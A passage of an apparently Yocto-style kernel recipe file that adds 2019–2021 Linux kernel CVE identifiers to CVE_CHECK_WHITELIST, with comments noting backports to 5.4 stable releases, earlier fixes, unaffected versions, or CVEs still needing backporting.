4424# fixed-version: Fixed after version 5.1rc2
4425CVE_CHECK_WHITELIST += "CVE-2019-9857"
4426
4427# cpe-stable-backport: Backported in 5.4.23
4428CVE_CHECK_WHITELIST += "CVE-2020-0009"
4429
4430# fixed-version: Fixed after version 4.16rc3
4431CVE_CHECK_WHITELIST += "CVE-2020-0030"
4432
4433# cpe-stable-backport: Backported in 5.4.4
4434CVE_CHECK_WHITELIST += "CVE-2020-0041"
4435
4436# fixed-version: Fixed after version 4.3rc7
4437CVE_CHECK_WHITELIST += "CVE-2020-0066"
4438
4439# cpe-stable-backport: Backported in 5.4.36
4440CVE_CHECK_WHITELIST += "CVE-2020-0067"
4441
4442# cpe-stable-backport: Backported in 5.4.23
4443CVE_CHECK_WHITELIST += "CVE-2020-0110"
4444
4445# cpe-stable-backport: Backported in 5.4.39
4446CVE_CHECK_WHITELIST += "CVE-2020-0255"
4447
4448# cpe-stable-backport: Backported in 5.4.12
4449CVE_CHECK_WHITELIST += "CVE-2020-0305"
4450
4451# CVE-2020-0347 has no known resolution
4452
4453# cpe-stable-backport: Backported in 5.4.19
4454CVE_CHECK_WHITELIST += "CVE-2020-0404"
4455
4456# cpe-stable-backport: Backported in 5.4.73
4457CVE_CHECK_WHITELIST += "CVE-2020-0423"
4458
4459# cpe-stable-backport: Backported in 5.4.7
4460CVE_CHECK_WHITELIST += "CVE-2020-0427"
4461
4462# fixed-version: Fixed after version 4.14rc4
4463CVE_CHECK_WHITELIST += "CVE-2020-0429"
4464
4465# fixed-version: Fixed after version 4.18rc1
4466CVE_CHECK_WHITELIST += "CVE-2020-0430"
4467
4468# cpe-stable-backport: Backported in 5.4.12
4469CVE_CHECK_WHITELIST += "CVE-2020-0431"
4470
4471# cpe-stable-backport: Backported in 5.4.17
4472CVE_CHECK_WHITELIST += "CVE-2020-0432"
4473
4474# fixed-version: Fixed after version 4.19rc1
4475CVE_CHECK_WHITELIST += "CVE-2020-0433"
4476
4477# fixed-version: Fixed after version 4.19rc1
4478CVE_CHECK_WHITELIST += "CVE-2020-0435"
4479
4480# cpe-stable-backport: Backported in 5.4.24
4481CVE_CHECK_WHITELIST += "CVE-2020-0444"
4482
4483# cpe-stable-backport: Backported in 5.4.63
4484CVE_CHECK_WHITELIST += "CVE-2020-0465"
4485
4486# cpe-stable-backport: Backported in 5.4.61
4487CVE_CHECK_WHITELIST += "CVE-2020-0466"
4488
4489# cpe-stable-backport: Backported in 5.4.46
4490CVE_CHECK_WHITELIST += "CVE-2020-0543"
4491
4492# cpe-stable-backport: Backported in 5.4.72
4493CVE_CHECK_WHITELIST += "CVE-2020-10135"
4494
4495# cpe-stable-backport: Backported in 5.4.8
4496CVE_CHECK_WHITELIST += "CVE-2020-10690"
4497
4498# CVE-2020-10708 has no known resolution
4499
4500# cpe-stable-backport: Backported in 5.4.42
4501CVE_CHECK_WHITELIST += "CVE-2020-10711"
4502
4503# fixed-version: Fixed after version 5.2rc3
4504CVE_CHECK_WHITELIST += "CVE-2020-10720"
4505
4506# cpe-stable-backport: Backported in 5.4.44
4507CVE_CHECK_WHITELIST += "CVE-2020-10732"
4508
4509# fixed-version: Fixed after version 3.16rc1
4510CVE_CHECK_WHITELIST += "CVE-2020-10742"
4511
4512# cpe-stable-backport: Backported in 5.4.39
4513CVE_CHECK_WHITELIST += "CVE-2020-10751"
4514
4515# cpe-stable-backport: Backported in 5.4.45
4516CVE_CHECK_WHITELIST += "CVE-2020-10757"
4517
4518# cpe-stable-backport: Backported in 5.4.47
4519CVE_CHECK_WHITELIST += "CVE-2020-10766"
4520
4521# cpe-stable-backport: Backported in 5.4.47
4522CVE_CHECK_WHITELIST += "CVE-2020-10767"
4523
4524# cpe-stable-backport: Backported in 5.4.47
4525CVE_CHECK_WHITELIST += "CVE-2020-10768"
4526
4527# fixed-version: Fixed after version 5.0rc3
4528CVE_CHECK_WHITELIST += "CVE-2020-10769"
4529
4530# fixed-version: Fixed after version 5.4rc6
4531CVE_CHECK_WHITELIST += "CVE-2020-10773"
4532
4533# CVE-2020-10774 has no known resolution
4534
4535# cpe-stable-backport: Backported in 5.4.53
4536CVE_CHECK_WHITELIST += "CVE-2020-10781"
4537
4538# cpe-stable-backport: Backported in 5.4.24
4539CVE_CHECK_WHITELIST += "CVE-2020-10942"
4540
4541# cpe-stable-backport: Backported in 5.4.32
4542CVE_CHECK_WHITELIST += "CVE-2020-11494"
4543
4544# cpe-stable-backport: Backported in 5.4.31
4545CVE_CHECK_WHITELIST += "CVE-2020-11565"
4546
4547# cpe-stable-backport: Backported in 5.4.29
4548CVE_CHECK_WHITELIST += "CVE-2020-11608"
4549
4550# cpe-stable-backport: Backported in 5.4.29
4551CVE_CHECK_WHITELIST += "CVE-2020-11609"
4552
4553# cpe-stable-backport: Backported in 5.4.29
4554CVE_CHECK_WHITELIST += "CVE-2020-11668"
4555
4556# fixed-version: Fixed after version 5.2rc1
4557CVE_CHECK_WHITELIST += "CVE-2020-11669"
4558
4559# CVE-2020-11725 has no known resolution
4560
4561# cpe-stable-backport: Backported in 5.4.36
4562CVE_CHECK_WHITELIST += "CVE-2020-11884"
4563
4564# CVE-2020-11935 has no known resolution
4565
4566# fixed-version: Fixed after version 5.3rc1
4567CVE_CHECK_WHITELIST += "CVE-2020-12114"
4568
4569# cpe-stable-backport: Backported in 5.4.72
4570CVE_CHECK_WHITELIST += "CVE-2020-12351"
4571
4572# cpe-stable-backport: Backported in 5.4.72
4573CVE_CHECK_WHITELIST += "CVE-2020-12352"
4574
4575# CVE-2020-12362 needs backporting (fixed from 5.11rc1)
4576
4577# CVE-2020-12363 needs backporting (fixed from 5.11rc1)
4578
4579# CVE-2020-12364 needs backporting (fixed from 5.11rc1)
4580
4581# cpe-stable-backport: Backported in 5.4.36
4582CVE_CHECK_WHITELIST += "CVE-2020-12464"
4583
4584# cpe-stable-backport: Backported in 5.4.26
4585CVE_CHECK_WHITELIST += "CVE-2020-12465"
4586
4587# cpe-stable-backport: Backported in 5.4.14
4588CVE_CHECK_WHITELIST += "CVE-2020-12652"
4589
4590# cpe-stable-backport: Backported in 5.4.20
4591CVE_CHECK_WHITELIST += "CVE-2020-12653"
4592
4593# cpe-stable-backport: Backported in 5.4.20
4594CVE_CHECK_WHITELIST += "CVE-2020-12654"
4595
4596# cpe-stable-backport: Backported in 5.4.50
4597CVE_CHECK_WHITELIST += "CVE-2020-12655"
4598
4599# cpe-stable-backport: Backported in 5.4.56
4600CVE_CHECK_WHITELIST += "CVE-2020-12656"
4601
4602# cpe-stable-backport: Backported in 5.4.33
4603CVE_CHECK_WHITELIST += "CVE-2020-12657"
4604
4605# cpe-stable-backport: Backported in 5.4.35
4606CVE_CHECK_WHITELIST += "CVE-2020-12659"
4607
4608# cpe-stable-backport: Backported in 5.4.43
4609CVE_CHECK_WHITELIST += "CVE-2020-12768"
4610
4611# cpe-stable-backport: Backported in 5.4.17
4612CVE_CHECK_WHITELIST += "CVE-2020-12769"
4613
4614# cpe-stable-backport: Backported in 5.4.42
4615CVE_CHECK_WHITELIST += "CVE-2020-12770"
4616
4617# cpe-stable-backport: Backported in 5.4.49
4618CVE_CHECK_WHITELIST += "CVE-2020-12771"
4619
4620# cpe-stable-backport: Backported in 5.4.33
4621CVE_CHECK_WHITELIST += "CVE-2020-12826"
4622
4623# cpe-stable-backport: Backported in 5.4.64
4624CVE_CHECK_WHITELIST += "CVE-2020-12888"
4625
4626# fixed-version: only affects 5.8rc1 onwards
4627CVE_CHECK_WHITELIST += "CVE-2020-12912"
4628
4629# cpe-stable-backport: Backported in 5.4.42
4630CVE_CHECK_WHITELIST += "CVE-2020-13143"
4631
4632# cpe-stable-backport: Backported in 5.4.46
4633CVE_CHECK_WHITELIST += "CVE-2020-13974"
4634
4635# CVE-2020-14304 has no known resolution
4636
4637# fixed-version: Fixed after version 4.12rc1
4638CVE_CHECK_WHITELIST += "CVE-2020-14305"
4639
4640# cpe-stable-backport: Backported in 5.4.61
4641CVE_CHECK_WHITELIST += "CVE-2020-14314"
4642
4643# cpe-stable-backport: Backported in 5.4.58
4644CVE_CHECK_WHITELIST += "CVE-2020-14331"
4645
4646# cpe-stable-backport: Backported in 5.4.78
4647CVE_CHECK_WHITELIST += "CVE-2020-14351"
4648
4649# fixed-version: Fixed after version 4.14rc3
4650CVE_CHECK_WHITELIST += "CVE-2020-14353"
4651
4652# cpe-stable-backport: Backported in 5.4.53
4653CVE_CHECK_WHITELIST += "CVE-2020-14356"
4654
4655# cpe-stable-backport: Backported in 5.4.28
4656CVE_CHECK_WHITELIST += "CVE-2020-14381"
4657
4658# cpe-stable-backport: Backported in 5.4.64
4659CVE_CHECK_WHITELIST += "CVE-2020-14385"
4660
4661# cpe-stable-backport: Backported in 5.4.64
4662CVE_CHECK_WHITELIST += "CVE-2020-14386"
4663
4664# cpe-stable-backport: Backported in 5.4.66
4665CVE_CHECK_WHITELIST += "CVE-2020-14390"
4666
4667# cpe-stable-backport: Backported in 5.4.16
4668CVE_CHECK_WHITELIST += "CVE-2020-14416"
4669
4670# cpe-stable-backport: Backported in 5.4.51
4671CVE_CHECK_WHITELIST += "CVE-2020-15393"
4672
4673# cpe-stable-backport: Backported in 5.4.49
4674CVE_CHECK_WHITELIST += "CVE-2020-15436"
4675
4676# cpe-stable-backport: Backported in 5.4.54
4677CVE_CHECK_WHITELIST += "CVE-2020-15437"
4678
4679# cpe-stable-backport: Backported in 5.4.50
4680CVE_CHECK_WHITELIST += "CVE-2020-15780"
4681
4682# CVE-2020-15802 has no known resolution
4683
4684# fixed-version: only affects 5.5rc1 onwards
4685CVE_CHECK_WHITELIST += "CVE-2020-15852"
4686
4687# cpe-stable-backport: Backported in 5.4.148
4688CVE_CHECK_WHITELIST += "CVE-2020-16119"
4689
4690# CVE-2020-16120 needs backporting (fixed from 5.8rc1)
4691
4692# cpe-stable-backport: Backported in 5.4.57
4693CVE_CHECK_WHITELIST += "CVE-2020-16166"
4694
4695# cpe-stable-backport: Backported in 5.4.5
4696CVE_CHECK_WHITELIST += "CVE-2020-1749"
4697
4698# cpe-stable-backport: Backported in 5.4.51
4699CVE_CHECK_WHITELIST += "CVE-2020-24394"
4700
4701# cpe-stable-backport: Backported in 5.4.56
4702CVE_CHECK_WHITELIST += "CVE-2020-24490"
4703
4704# CVE-2020-24502 has no known resolution
4705
4706# CVE-2020-24503 has no known resolution
4707
4708# CVE-2020-24504 needs backporting (fixed from 5.12rc1)
4709
4710# cpe-stable-backport: Backported in 5.4.124
4711CVE_CHECK_WHITELIST += "CVE-2020-24586"
4712
4713# cpe-stable-backport: Backported in 5.4.124
4714CVE_CHECK_WHITELIST += "CVE-2020-24587"
4715
4716# cpe-stable-backport: Backported in 5.4.124
4717CVE_CHECK_WHITELIST += "CVE-2020-24588"
4718
4719# cpe-stable-backport: Backported in 5.4.70
4720CVE_CHECK_WHITELIST += "CVE-2020-25211"
4721
4722# cpe-stable-backport: Backported in 5.4.60
4723CVE_CHECK_WHITELIST += "CVE-2020-25212"
4724
4725# CVE-2020-25220 has no known resolution
4726
4727# fixed-version: only affects 5.7rc1 onwards
4728CVE_CHECK_WHITELIST += "CVE-2020-25221"
4729
4730# cpe-stable-backport: Backported in 5.4.66
4731CVE_CHECK_WHITELIST += "CVE-2020-25284"
4732
4733# cpe-stable-backport: Backported in 5.4.64
4734CVE_CHECK_WHITELIST += "CVE-2020-25285"
4735
4736# cpe-stable-backport: Backported in 5.4.102
4737CVE_CHECK_WHITELIST += "CVE-2020-25639"
4738
4739# cpe-stable-backport: Backported in 5.4.64
4740CVE_CHECK_WHITELIST += "CVE-2020-25641"
4741
4742# cpe-stable-backport: Backported in 5.4.68
4743CVE_CHECK_WHITELIST += "CVE-2020-25643"
4744
4745# cpe-stable-backport: Backported in 5.4.68
4746CVE_CHECK_WHITELIST += "CVE-2020-25645"
4747
4748# cpe-stable-backport: Backported in 5.4.75
4749CVE_CHECK_WHITELIST += "CVE-2020-25656"
4750
4751# CVE-2020-25661 has no known resolution
4752
4753# CVE-2020-25662 has no known resolution
4754
4755# cpe-stable-backport: Backported in 5.4.75
4756CVE_CHECK_WHITELIST += "CVE-2020-25668"
4757
4758# cpe-stable-backport: Backported in 5.4.79
4759CVE_CHECK_WHITELIST += "CVE-2020-25669"
4760
4761# cpe-stable-backport: Backported in 5.4.112
4762CVE_CHECK_WHITELIST += "CVE-2020-25670"
4763
4764# cpe-stable-backport: Backported in 5.4.112
4765CVE_CHECK_WHITELIST += "CVE-2020-25671"
4766
4767# cpe-stable-backport: Backported in 5.4.112
4768CVE_CHECK_WHITELIST += "CVE-2020-25672"
4769
4770# cpe-stable-backport: Backported in 5.4.112
4771CVE_CHECK_WHITELIST += "CVE-2020-25673"
4772
4773# cpe-stable-backport: Backported in 5.4.76
4774CVE_CHECK_WHITELIST += "CVE-2020-25704"
4775
4776# cpe-stable-backport: Backported in 5.4.73
4777CVE_CHECK_WHITELIST += "CVE-2020-25705"
4778
4779# cpe-stable-backport: Backported in 5.4.59
4780CVE_CHECK_WHITELIST += "CVE-2020-26088"
4781
4782# cpe-stable-backport: Backported in 5.4.124
4783CVE_CHECK_WHITELIST += "CVE-2020-26139"
4784
4785# CVE-2020-26140 has no known resolution
4786
4787# cpe-stable-backport: Backported in 5.4.124
4788CVE_CHECK_WHITELIST += "CVE-2020-26141"
4789
4790# CVE-2020-26142 has no known resolution
4791
4792# CVE-2020-26143 has no known resolution
4793
4794# cpe-stable-backport: Backported in 5.4.124
4795CVE_CHECK_WHITELIST += "CVE-2020-26145"
4796
4797# cpe-stable-backport: Backported in 5.4.124
4798CVE_CHECK_WHITELIST += "CVE-2020-26147"
4799
4800# cpe-stable-backport: Backported in 5.4.129
4801CVE_CHECK_WHITELIST += "CVE-2020-26541"
4802
4803# cpe-stable-backport: Backported in 5.4.122
4804CVE_CHECK_WHITELIST += "CVE-2020-26555"
4805
4806# CVE-2020-26556 has no known resolution
4807
4808# CVE-2020-26557 has no known resolution
4809
4810# cpe-stable-backport: Backported in 5.4.122
4811CVE_CHECK_WHITELIST += "CVE-2020-26558"
4812
4813# CVE-2020-26559 has no known resolution
4814
4815# CVE-2020-26560 has no known resolution
4816
4817# cpe-stable-backport: Backported in 5.4.29
4818CVE_CHECK_WHITELIST += "CVE-2020-27066"
4819
4820# fixed-version: Fixed after version 4.14rc4
4821CVE_CHECK_WHITELIST += "CVE-2020-27067"
4822
4823# cpe-stable-backport: Backported in 5.4.24
4824CVE_CHECK_WHITELIST += "CVE-2020-27068"
4825
4826# fixed-version: only affects 5.6rc1 onwards
4827CVE_CHECK_WHITELIST += "CVE-2020-27152"
4828
4829# fixed-version: only affects 5.10rc1 onwards
4830CVE_CHECK_WHITELIST += "CVE-2020-27170"
4831
4832# fixed-version: only affects 5.10rc1 onwards
4833CVE_CHECK_WHITELIST += "CVE-2020-27171"
4834
4835# fixed-version: only affects 5.7rc1 onwards
4836CVE_CHECK_WHITELIST += "CVE-2020-27194"
4837
4838# cpe-stable-backport: Backported in 5.4.23
4839CVE_CHECK_WHITELIST += "CVE-2020-2732"
4840
4841# cpe-stable-backport: Backported in 5.4.25
4842CVE_CHECK_WHITELIST += "CVE-2020-27418"
4843
4844# cpe-stable-backport: Backported in 5.4.75
4845CVE_CHECK_WHITELIST += "CVE-2020-27673"
4846
4847# cpe-stable-backport: Backported in 5.4.75
4848CVE_CHECK_WHITELIST += "CVE-2020-27675"
4849
4850# cpe-stable-backport: Backported in 5.4.75
4851CVE_CHECK_WHITELIST += "CVE-2020-27777"
4852
4853# cpe-stable-backport: Backported in 5.4.73
4854CVE_CHECK_WHITELIST += "CVE-2020-27784"
4855
4856# cpe-stable-backport: Backported in 5.4.42
4857CVE_CHECK_WHITELIST += "CVE-2020-27786"
4858
4859# cpe-stable-backport: Backported in 5.4.86
4860CVE_CHECK_WHITELIST += "CVE-2020-27815"
4861
4862# cpe-stable-backport: Backported in 5.4.162
4863CVE_CHECK_WHITELIST += "CVE-2020-27820"
4864
4865# cpe-stable-backport: Backported in 5.4.94
4866CVE_CHECK_WHITELIST += "CVE-2020-27825"
4867
4868# cpe-stable-backport: Backported in 5.4.83
4869CVE_CHECK_WHITELIST += "CVE-2020-27830"
4870
4871# CVE-2020-27835 needs backporting (fixed from 5.10rc6)
4872
4873# cpe-stable-backport: Backported in 5.4.66
4874CVE_CHECK_WHITELIST += "CVE-2020-28097"
4875
4876# cpe-stable-backport: Backported in 5.4.89
4877CVE_CHECK_WHITELIST += "CVE-2020-28374"
4878
4879# cpe-stable-backport: Backported in 5.4.83
4880CVE_CHECK_WHITELIST += "CVE-2020-28588"
4881
4882# cpe-stable-backport: Backported in 5.4.71
4883CVE_CHECK_WHITELIST += "CVE-2020-28915"
4884
4885# cpe-stable-backport: Backported in 5.4.80
4886CVE_CHECK_WHITELIST += "CVE-2020-28941"
4887
4888# cpe-stable-backport: Backported in 5.4.76
4889CVE_CHECK_WHITELIST += "CVE-2020-28974"
4890
4891# cpe-stable-backport: Backported in 5.4.48
4892CVE_CHECK_WHITELIST += "CVE-2020-29368"
4893
4894# cpe-stable-backport: Backported in 5.4.54
4895CVE_CHECK_WHITELIST += "CVE-2020-29369"
4896
4897# cpe-stable-backport: Backported in 5.4.27
4898CVE_CHECK_WHITELIST += "CVE-2020-29370"
4899
4900# cpe-stable-backport: Backported in 5.4.61
4901CVE_CHECK_WHITELIST += "CVE-2020-29371"
4902
4903# fixed-version: only affects 5.6rc1 onwards
4904CVE_CHECK_WHITELIST += "CVE-2020-29372"
4905
4906# CVE-2020-29373 needs backporting (fixed from 5.6rc2)
4907
4908# cpe-stable-backport: Backported in 5.4.47
4909CVE_CHECK_WHITELIST += "CVE-2020-29374"
4910
4911# CVE-2020-29534 needs backporting (fixed from 5.10rc1)
4912
4913# cpe-stable-backport: Backported in 5.4.86
4914CVE_CHECK_WHITELIST += "CVE-2020-29568"
4915
4916# cpe-stable-backport: Backported in 5.4.86
4917CVE_CHECK_WHITELIST += "CVE-2020-29569"
4918
4919# cpe-stable-backport: Backported in 5.4.83
4920CVE_CHECK_WHITELIST += "CVE-2020-29660"
4921
4922# cpe-stable-backport: Backported in 5.4.83
4923CVE_CHECK_WHITELIST += "CVE-2020-29661"
4924
4925# fixed-version: only affects 5.10rc1 onwards
4926CVE_CHECK_WHITELIST += "CVE-2020-35499"
4927
4928# CVE-2020-35501 has no known resolution
4929
4930# cpe-stable-backport: Backported in 5.4.76
4931CVE_CHECK_WHITELIST += "CVE-2020-35508"
4932
4933# fixed-version: Fixed after version 4.17rc1
4934CVE_CHECK_WHITELIST += "CVE-2020-35513"
4935
4936# cpe-stable-backport: Backported in 5.4.82
4937CVE_CHECK_WHITELIST += "CVE-2020-35519"
4938
4939# cpe-stable-backport: Backported in 5.4.88
4940CVE_CHECK_WHITELIST += "CVE-2020-36158"
4941
4942# CVE-2020-36310 needs backporting (fixed from 5.8rc1)
4943
4944# cpe-stable-backport: Backported in 5.4.131
4945CVE_CHECK_WHITELIST += "CVE-2020-36311"
4946
4947# cpe-stable-backport: Backported in 5.4.66
4948CVE_CHECK_WHITELIST += "CVE-2020-36312"
4949
4950# fixed-version: only affects 5.7rc1 onwards
4951CVE_CHECK_WHITELIST += "CVE-2020-36313"
4952
4953# cpe-stable-backport: Backported in 5.4.88
4954CVE_CHECK_WHITELIST += "CVE-2020-36322"
4955
4956# CVE-2020-36385 needs backporting (fixed from 5.10rc1)
4957
4958# cpe-stable-backport: Backported in 5.4.58
4959CVE_CHECK_WHITELIST += "CVE-2020-36386"
4960
4961# fixed-version: only affects 5.7rc1 onwards
4962CVE_CHECK_WHITELIST += "CVE-2020-36387"
4963
4964# cpe-stable-backport: Backported in 5.4.176
4965CVE_CHECK_WHITELIST += "CVE-2020-36516"
4966
4967# cpe-stable-backport: Backported in 5.4.30
4968CVE_CHECK_WHITELIST += "CVE-2020-36557"
4969
4970# cpe-stable-backport: Backported in 5.4.23
4971CVE_CHECK_WHITELIST += "CVE-2020-36558"
4972
4973# CVE-2020-36691 needs backporting (fixed from 5.8rc1)
4974
4975# cpe-stable-backport: Backported in 5.4.86
4976CVE_CHECK_WHITELIST += "CVE-2020-36694"
4977
4978# cpe-stable-backport: Backported in 5.4.62
4979CVE_CHECK_WHITELIST += "CVE-2020-36766"
4980
4981# cpe-stable-backport: Backported in 5.4.189
4982CVE_CHECK_WHITELIST += "CVE-2020-36775"
4983
4984# fixed-version: only affects 5.8rc4 onwards
4985CVE_CHECK_WHITELIST += "CVE-2020-36776"
4986
4987# cpe-stable-backport: Backported in 5.4.118
4988CVE_CHECK_WHITELIST += "CVE-2020-36777"
4989
4990# fixed-version: only affects 5.6rc1 onwards
4991CVE_CHECK_WHITELIST += "CVE-2020-36778"
4992
4993# fixed-version: only affects 5.6rc1 onwards
4994CVE_CHECK_WHITELIST += "CVE-2020-36779"
4995
4996# cpe-stable-backport: Backported in 5.4.119
4997CVE_CHECK_WHITELIST += "CVE-2020-36780"
4998
4999# CVE-2020-36781 needs backporting (fixed from 5.13rc1)
5000
5001# cpe-stable-backport: Backported in 5.4.119
5002CVE_CHECK_WHITELIST += "CVE-2020-36782"
5003
5004# cpe-stable-backport: Backported in 5.4.119
5005CVE_CHECK_WHITELIST += "CVE-2020-36783"
5006
5007# CVE-2020-36784 needs backporting (fixed from 5.13rc1)
5008
5009# fixed-version: only affects 5.8rc1 onwards
5010CVE_CHECK_WHITELIST += "CVE-2020-36785"
5011
5012# fixed-version: only affects 5.10rc1 onwards
5013CVE_CHECK_WHITELIST += "CVE-2020-36786"
5014
5015# cpe-stable-backport: Backported in 5.4.119
5016CVE_CHECK_WHITELIST += "CVE-2020-36787"
5017
5018# cpe-stable-backport: Backported in 5.4.143
5019CVE_CHECK_WHITELIST += "CVE-2020-3702"
5020
5021# cpe-stable-backport: Backported in 5.4.79
5022CVE_CHECK_WHITELIST += "CVE-2020-4788"
5023
5024# fixed-version: Fixed after version 5.2rc1
5025CVE_CHECK_WHITELIST += "CVE-2020-7053"
5026
5027# cpe-stable-backport: Backported in 5.4.16
5028CVE_CHECK_WHITELIST += "CVE-2020-8428"
5029
5030# cpe-stable-backport: Backported in 5.4.25
5031CVE_CHECK_WHITELIST += "CVE-2020-8647"
5032
5033# cpe-stable-backport: Backported in 5.4.25
5034CVE_CHECK_WHITELIST += "CVE-2020-8648"
5035
5036# cpe-stable-backport: Backported in 5.4.25
5037CVE_CHECK_WHITELIST += "CVE-2020-8649"
5038
5039# cpe-stable-backport: Backported in 5.4.77
5040CVE_CHECK_WHITELIST += "CVE-2020-8694"
5041
5042# CVE-2020-8832 has no known resolution
5043
5044# fixed-version: Fixed after version 4.18rc1
5045CVE_CHECK_WHITELIST += "CVE-2020-8834"
5046
5047# fixed-version: only affects 5.5rc1 onwards
5048CVE_CHECK_WHITELIST += "CVE-2020-8835"
5049
5050# cpe-stable-backport: Backported in 5.4.21
5051CVE_CHECK_WHITELIST += "CVE-2020-8992"
5052
5053# cpe-stable-backport: Backported in 5.4.23
5054CVE_CHECK_WHITELIST += "CVE-2020-9383"
5055
5056# cpe-stable-backport: Backported in 5.4.23
5057CVE_CHECK_WHITELIST += "CVE-2020-9391"
5058
5059# cpe-stable-backport: Backported in 5.4.122
5060CVE_CHECK_WHITELIST += "CVE-2021-0129"
5061
5062# cpe-stable-backport: Backported in 5.4.47
5063CVE_CHECK_WHITELIST += "CVE-2021-0342"
5064
5065# CVE-2021-0399 has no known resolution
5066
5067# fixed-version: Fixed after version 4.15rc1
5068CVE_CHECK_WHITELIST += "CVE-2021-0447"
5069
5070# cpe-stable-backport: Backported in 5.4.70
5071CVE_CHECK_WHITELIST += "CVE-2021-0448"
5072
5073# cpe-stable-backport: Backported in 5.4.101
5074CVE_CHECK_WHITELIST += "CVE-2021-0512"
5075
5076# cpe-stable-backport: Backported in 5.4.68
5077CVE_CHECK_WHITELIST += "CVE-2021-0605"
5078
5079# CVE-2021-0606 has no known resolution
5080
5081# CVE-2021-0695 has no known resolution
5082
5083# fixed-version: only affects 5.8rc4 onwards
5084CVE_CHECK_WHITELIST += "CVE-2021-0707"
5085
5086# cpe-stable-backport: Backported in 5.4.137
5087CVE_CHECK_WHITELIST += "CVE-2021-0920"
5088
5089# CVE-2021-0924 has no known resolution
5090
5091# CVE-2021-0929 needs backporting (fixed from 5.6rc1)
5092
5093# fixed-version: Fixed after version 4.16rc7
5094CVE_CHECK_WHITELIST += "CVE-2021-0935"
5095
5096# CVE-2021-0936 has no known resolution
5097
5098# cpe-stable-backport: Backported in 5.4.113
5099CVE_CHECK_WHITELIST += "CVE-2021-0937"
5100
5101# cpe-stable-backport: Backported in 5.4.84
5102CVE_CHECK_WHITELIST += "CVE-2021-0938"
5103
5104# cpe-stable-backport: Backported in 5.4.110
5105CVE_CHECK_WHITELIST += "CVE-2021-0941"
5106
5107# CVE-2021-0961 has no known resolution
5108
5109# fixed-version: only affects 5.9rc2 onwards
5110CVE_CHECK_WHITELIST += "CVE-2021-1048"
5111
5112# CVE-2021-20177 needs backporting (fixed from 5.5rc1)
5113
5114# fixed-version: only affects 5.5rc1 onwards
5115CVE_CHECK_WHITELIST += "CVE-2021-20194"
5116
5117# CVE-2021-20219 has no known resolution
5118
5119# fixed-version: only affects 5.5rc1 onwards
5120CVE_CHECK_WHITELIST += "CVE-2021-20226"
5121
5122# CVE-2021-20239 needs backporting (fixed from 5.9rc1)
5123
5124# fixed-version: Fixed after version 4.5rc5
5125CVE_CHECK_WHITELIST += "CVE-2021-20261"
5126
5127# fixed-version: Fixed after version 4.5rc3
5128CVE_CHECK_WHITELIST += "CVE-2021-20265"
5129
5130# fixed-version: only affects 5.7rc1 onwards
5131CVE_CHECK_WHITELIST += "CVE-2021-20268"
5132
5133# cpe-stable-backport: Backported in 5.4.59
5134CVE_CHECK_WHITELIST += "CVE-2021-20292"
5135
5136# fixed-version: Fixed after version 5.4rc1
5137CVE_CHECK_WHITELIST += "CVE-2021-20317"
5138
5139# cpe-stable-backport: Backported in 5.4.148
5140CVE_CHECK_WHITELIST += "CVE-2021-20320"
5141
5142# cpe-stable-backport: Backported in 5.4.153
5143CVE_CHECK_WHITELIST += "CVE-2021-20321"
5144
5145# cpe-stable-backport: Backported in 5.4.146
5146CVE_CHECK_WHITELIST += "CVE-2021-20322"
5147
5148# cpe-stable-backport: Backported in 5.4.99
5149CVE_CHECK_WHITELIST += "CVE-2021-21781"
5150
5151# cpe-stable-backport: Backported in 5.4.129
5152CVE_CHECK_WHITELIST += "CVE-2021-22543"
5153
5154# cpe-stable-backport: Backported in 5.4.113
5155CVE_CHECK_WHITELIST += "CVE-2021-22555"
5156
5157# fixed-version: only affects 5.6 onwards
5158CVE_CHECK_WHITELIST += "CVE-2021-22600"
5159
5160# cpe-stable-backport: Backported in 5.4.114
5161CVE_CHECK_WHITELIST += "CVE-2021-23133"
5162
5163# fixed-version: only affects 5.12rc7 onwards
5164CVE_CHECK_WHITELIST += "CVE-2021-23134"
5165
5166# cpe-stable-backport: Backported in 5.4.184
5167CVE_CHECK_WHITELIST += "CVE-2021-26401"
5168
5169# fixed-version: only affects 5.5rc1 onwards
5170CVE_CHECK_WHITELIST += "CVE-2021-26708"
5171
5172# cpe-stable-backport: Backported in 5.4.100
5173CVE_CHECK_WHITELIST += "CVE-2021-26930"
5174
5175# cpe-stable-backport: Backported in 5.4.100
5176CVE_CHECK_WHITELIST += "CVE-2021-26931"
5177
5178# cpe-stable-backport: Backported in 5.4.100
5179CVE_CHECK_WHITELIST += "CVE-2021-26932"
5180
5181# CVE-2021-26934 has no known resolution
5182
5183# cpe-stable-backport: Backported in 5.4.103
5184CVE_CHECK_WHITELIST += "CVE-2021-27363"
5185
5186# cpe-stable-backport: Backported in 5.4.103
5187CVE_CHECK_WHITELIST += "CVE-2021-27364"
5188
5189# cpe-stable-backport: Backported in 5.4.103
5190CVE_CHECK_WHITELIST += "CVE-2021-27365"
5191
5192# cpe-stable-backport: Backported in 5.4.103
5193CVE_CHECK_WHITELIST += "CVE-2021-28038"
5194
5195# fixed-version: only affects 5.9rc4 onwards
5196CVE_CHECK_WHITELIST += "CVE-2021-28039"
5197
5198# cpe-stable-backport: Backported in 5.4.106
5199CVE_CHECK_WHITELIST += "CVE-2021-28375"
5200
5201# cpe-stable-backport: Backported in 5.4.106
5202CVE_CHECK_WHITELIST += "CVE-2021-28660"
5203
5204# cpe-stable-backport: Backported in 5.4.109
5205CVE_CHECK_WHITELIST += "CVE-2021-28688"
5206
5207# fixed-version: only affects 5.5rc1 onwards
5208CVE_CHECK_WHITELIST += "CVE-2021-28691"
5209
5210# cpe-stable-backport: Backported in 5.4.168
5211CVE_CHECK_WHITELIST += "CVE-2021-28711"
5212
5213# cpe-stable-backport: Backported in 5.4.168
5214CVE_CHECK_WHITELIST += "CVE-2021-28712"
5215
5216# cpe-stable-backport: Backported in 5.4.168
5217CVE_CHECK_WHITELIST += "CVE-2021-28713"
5218
5219# cpe-stable-backport: Backported in 5.4.168
5220CVE_CHECK_WHITELIST += "CVE-2021-28714"
5221
5222# cpe-stable-backport: Backported in 5.4.168
5223CVE_CHECK_WHITELIST += "CVE-2021-28715"
5224
5225# fixed-version: only affects 5.11rc1 onwards
5226CVE_CHECK_WHITELIST += "CVE-2021-28950"
5227
5228# fixed-version: only affects 5.10rc1 onwards
5229CVE_CHECK_WHITELIST += "CVE-2021-28951"
5230
5231# fixed-version: only affects 5.7rc1 onwards
5232CVE_CHECK_WHITELIST += "CVE-2021-28952"
5233
5234# cpe-stable-backport: Backported in 5.4.108
5235CVE_CHECK_WHITELIST += "CVE-2021-28964"
5236
5237# cpe-stable-backport: Backported in 5.4.108
5238CVE_CHECK_WHITELIST += "CVE-2021-28971"
5239
